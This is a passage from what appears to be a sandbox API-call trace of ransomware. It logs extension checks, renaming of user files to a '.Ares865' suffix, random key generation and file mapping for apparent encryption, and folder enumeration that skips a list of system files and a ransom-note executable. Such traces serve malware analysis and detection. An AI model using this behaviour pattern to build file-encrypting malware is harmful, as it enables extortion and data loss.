-1 [0057.957] lstrlenW (lpString="rctd") returned 4 [0057.957] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0057.958] lstrlenW (lpString="rod") returned 3 [0057.958] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0057.958] lstrlenW (lpString="rodx") returned 4 [0057.958] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0057.958] lstrlenW (lpString="rpd") returned 3 [0057.958] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0057.958] lstrlenW (lpString="rsd") returned 3 [0057.958] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0057.958] lstrlenW (lpString="sas7bdat") returned 8 [0057.958] lstrcmpiW (lpString1="user.ini", lpString2="sas7bdat") returned 1 [0057.958] lstrlenW (lpString="sbf") returned 3 [0057.958] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0057.958] lstrlenW (lpString="scx") returned 3 [0057.958] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0057.958] lstrlenW (lpString="sdb") returned 3 [0057.958] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0057.958] lstrlenW (lpString="sdc") returned 3 [0057.958] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0057.958] lstrlenW (lpString="sdf") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0057.959] lstrlenW (lpString="sis") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0057.959] lstrlenW (lpString="spq") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0057.959] lstrlenW (lpString="te") returned 2 [0057.959] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0057.959] lstrlenW (lpString="teacher") returned 7 [0057.959] lstrcmpiW (lpString1="ser.ini", lpString2="teacher") returned -1 [0057.959] lstrlenW (lpString="tmd") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0057.959] lstrlenW (lpString="tps") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0057.959] lstrlenW (lpString="trc") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0057.959] lstrlenW (lpString="trc") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0057.959] lstrlenW (lpString="trm") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0057.959] lstrlenW (lpString="udb") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0057.959] lstrlenW (lpString="udl") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0057.959] lstrlenW (lpString="usr") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0057.959] lstrlenW (lpString="v12") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0057.959] lstrlenW (lpString="vis") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0057.959] lstrlenW (lpString="vpd") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0057.959] lstrlenW (lpString="vvv") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0057.959] lstrlenW (lpString="wdb") returned 3 [0057.959] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0057.959] lstrlenW (lpString="wmdb") returned 4 [0057.959] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0057.959] lstrlenW (lpString="wrk") returned 3 [0057.960] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0057.960] lstrlenW (lpString="xdb") returned 3 [0057.960] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0057.960] lstrlenW (lpString="xld") returned 3 [0057.960] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0057.960] lstrlenW (lpString="xmlff") returned 5 [0057.960] lstrcmpiW (lpString1="r.ini", lpString2="xmlff") returned -1 [0057.960] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\ntuser.ini.Ares865") returned 40 [0057.960] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\ntuser.ini" (normalized: "c:\\users\\default user\\ntuser.ini"), lpNewFileName="C:\\Users\\Default User\\ntuser.ini.Ares865" (normalized: "c:\\users\\default user\\ntuser.ini.ares865"), dwFlags=0x1) returned 1 [0057.961] CreateFileW (lpFileName="C:\\Users\\Default User\\ntuser.ini.Ares865" (normalized: "c:\\users\\default user\\ntuser.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.961] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20) returned 1 [0057.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0057.961] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0057.961] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0057.962] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.962] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.962] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x154 [0057.967] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0057.968] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0057.968] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.969] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0057.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0057.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0057.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.969] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.969] CloseHandle (hObject=0x154) returned 1 [0057.969] CloseHandle (hObject=0x15c) returned 1 [0057.970] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0057.971] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0057.971] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.971] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="aoldtz.exe") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="temp") returned -1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="ntuser.dat") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="perflogs") returned 1 [0057.971] lstrcmpiW (lpString1="Pictures", lpString2="MSBuild") returned 1 [0057.971] lstrlenW (lpString="Pictures") returned 8 [0057.971] lstrlenW (lpString="C:\\Users\\Default User\\ntuser.ini") returned 32 [0057.971] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0057.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0057.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3e) returned 0x2e5fb8 [0057.971] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7cb0 [0057.971] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0057.971] lstrcmpiW (lpString1="PrintHood", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.971] lstrcmpiW (lpString1="PrintHood", lpString2="aoldtz.exe") returned 1 [0057.971] lstrcmpiW (lpString1="PrintHood", lpString2=".") returned 1 [0057.971] lstrcmpiW (lpString1="PrintHood", lpString2="..") returned 1 [0057.971] lstrcmpiW (lpString1="PrintHood", lpString2="windows") returned -1 [0057.971] lstrcmpiW (lpString1="PrintHood", lpString2="bootmgr") returned 1 [0057.971] lstrcmpiW (lpString1="PrintHood", lpString2="temp") returned -1 [0057.971] lstrcmpiW (lpString1="PrintHood", lpString2="pagefile.sys") returned 1 [0057.972] lstrcmpiW (lpString1="PrintHood", lpString2="boot") returned 1 [0057.972] lstrcmpiW (lpString1="PrintHood", lpString2="ids.txt") returned 1 [0057.972] lstrcmpiW (lpString1="PrintHood", lpString2="ntuser.dat") returned 1 [0057.972] lstrcmpiW (lpString1="PrintHood", lpString2="perflogs") returned 1 [0057.972] lstrcmpiW (lpString1="PrintHood", lpString2="MSBuild") returned 1 [0057.972] lstrlenW (lpString="PrintHood") returned 9 [0057.972] lstrlenW (lpString="C:\\Users\\Default User\\Pictures") returned 30 [0057.972] lstrcpyW (in: lpString1=0x2cce42c, lpString2="PrintHood" | out: lpString1="PrintHood") returned="PrintHood" [0057.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0057.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e6438 [0057.972] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d2248 [0057.972] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="aoldtz.exe") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="bootmgr") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="temp") returned -1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="pagefile.sys") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="boot") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="ids.txt") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="ntuser.dat") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="perflogs") returned 1 [0057.972] lstrcmpiW (lpString1="Recent", lpString2="MSBuild") returned 1 [0057.972] lstrlenW (lpString="Recent") returned 6 [0057.972] lstrlenW (lpString="C:\\Users\\Default User\\PrintHood") returned 31 [0057.972] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Recent" | out: lpString1="Recent") returned="Recent" [0057.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0057.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2e6480 [0057.972] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2288 | out: ListHead=0x2e7710, ListEntry=0x2d2288) returned 0x2d2268 [0057.972] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e7cb40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0057.972] lstrcmpiW (lpString1="Saved Games", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.972] lstrcmpiW (lpString1="Saved Games", lpString2="aoldtz.exe") returned 1 [0057.972] lstrcmpiW (lpString1="Saved Games", lpString2=".") returned 1 [0057.972] lstrcmpiW (lpString1="Saved Games", lpString2="..") returned 1 [0057.972] lstrcmpiW (lpString1="Saved Games", lpString2="windows") returned -1 [0057.973] lstrcmpiW (lpString1="Saved Games", lpString2="bootmgr") returned 1 [0057.973] lstrcmpiW (lpString1="Saved Games", lpString2="temp") returned -1 [0057.973] lstrcmpiW (lpString1="Saved Games", lpString2="pagefile.sys") returned 1 [0057.973] lstrcmpiW (lpString1="Saved Games", lpString2="boot") returned 1 [0057.973] lstrcmpiW (lpString1="Saved Games", lpString2="ids.txt") returned 1 [0057.973] lstrcmpiW (lpString1="Saved Games", lpString2="ntuser.dat") returned 1 [0057.973] lstrcmpiW (lpString1="Saved Games", lpString2="perflogs") returned 1 [0057.973] lstrcmpiW (lpString1="Saved Games", lpString2="MSBuild") returned 1 [0057.973] lstrlenW (lpString="Saved Games") returned 11 [0057.973] lstrlenW (lpString="C:\\Users\\Default User\\Recent") returned 28 [0057.973] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0057.973] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2340 [0057.973] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x44) returned 0x2ee920 [0057.973] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2348 | out: ListHead=0x2e7710, ListEntry=0x2d2348) returned 0x2d2288 [0057.973] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49e569e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e569e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="aoldtz.exe") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2=".") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="..") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="windows") returned -1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="bootmgr") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="temp") returned -1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="pagefile.sys") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="boot") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="ids.txt") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="ntuser.dat") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="perflogs") returned 1 [0057.973] lstrcmpiW (lpString1="Searches", lpString2="MSBuild") returned 1 [0057.973] lstrlenW (lpString="Searches") returned 8 [0057.973] lstrlenW (lpString="C:\\Users\\Default User\\Saved Games") returned 33 [0057.973] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0057.973] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0057.973] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3e) returned 0x2e64c8 [0057.973] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d22e8 | out: ListHead=0x2e7710, ListEntry=0x2d22e8) returned 0x2d2348 [0057.973] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0057.973] lstrcmpiW (lpString1="SendTo", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.973] lstrcmpiW (lpString1="SendTo", lpString2="aoldtz.exe") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="windows") returned -1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="bootmgr") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="temp") returned -1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="pagefile.sys") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="boot") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="ids.txt") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="ntuser.dat") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="perflogs") returned 1 [0057.974] lstrcmpiW (lpString1="SendTo", lpString2="MSBuild") returned 1 [0057.974] lstrlenW (lpString="SendTo") returned 6 [0057.974] lstrlenW (lpString="C:\\Users\\Default User\\Searches") returned 30 [0057.974] lstrcpyW (in: lpString1=0x2cce42c, lpString2="SendTo" | out: lpString1="SendTo") returned="SendTo" [0057.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0057.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2e6510 [0057.974] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2368 | out: ListHead=0x2e7710, ListEntry=0x2d2368) returned 0x2d22e8 [0057.974] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="aoldtz.exe") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="bootmgr") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="temp") returned -1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="pagefile.sys") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="boot") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="ids.txt") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="ntuser.dat") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="perflogs") returned 1 [0057.974] lstrcmpiW (lpString1="Start Menu", lpString2="MSBuild") returned 1 [0057.974] lstrlenW (lpString="Start Menu") returned 10 [0057.974] lstrlenW (lpString="C:\\Users\\Default User\\SendTo") returned 28 [0057.974] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Start Menu" | out: lpString1="Start Menu") returned="Start Menu" [0057.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0057.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x42) returned 0x2ee9c0 [0057.975] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0057.975] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="aoldtz.exe") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="bootmgr") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="temp") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="pagefile.sys") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="boot") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="ids.txt") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="ntuser.dat") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="perflogs") returned 1 [0057.975] lstrcmpiW (lpString1="Templates", lpString2="MSBuild") returned 1 [0057.975] lstrlenW (lpString="Templates") returned 9 [0057.975] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu") returned 32 [0057.975] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Templates" | out: lpString1="Templates") returned="Templates" [0057.975] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0057.975] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e6558 [0057.975] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23a8 | out: ListHead=0x2e7710, ListEntry=0x2d23a8) returned 0x2d2388 [0057.975] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49b82fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="aoldtz.exe") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="temp") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="ntuser.dat") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="perflogs") returned 1 [0057.975] lstrcmpiW (lpString1="Videos", lpString2="MSBuild") returned 1 [0057.975] lstrlenW (lpString="Videos") returned 6 [0057.976] lstrlenW (lpString="C:\\Users\\Default User\\Templates") returned 31 [0057.976] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0057.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0057.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2e65a0 [0057.976] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23c8 | out: ListHead=0x2e7710, ListEntry=0x2d23c8) returned 0x2d23a8 [0057.976] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, 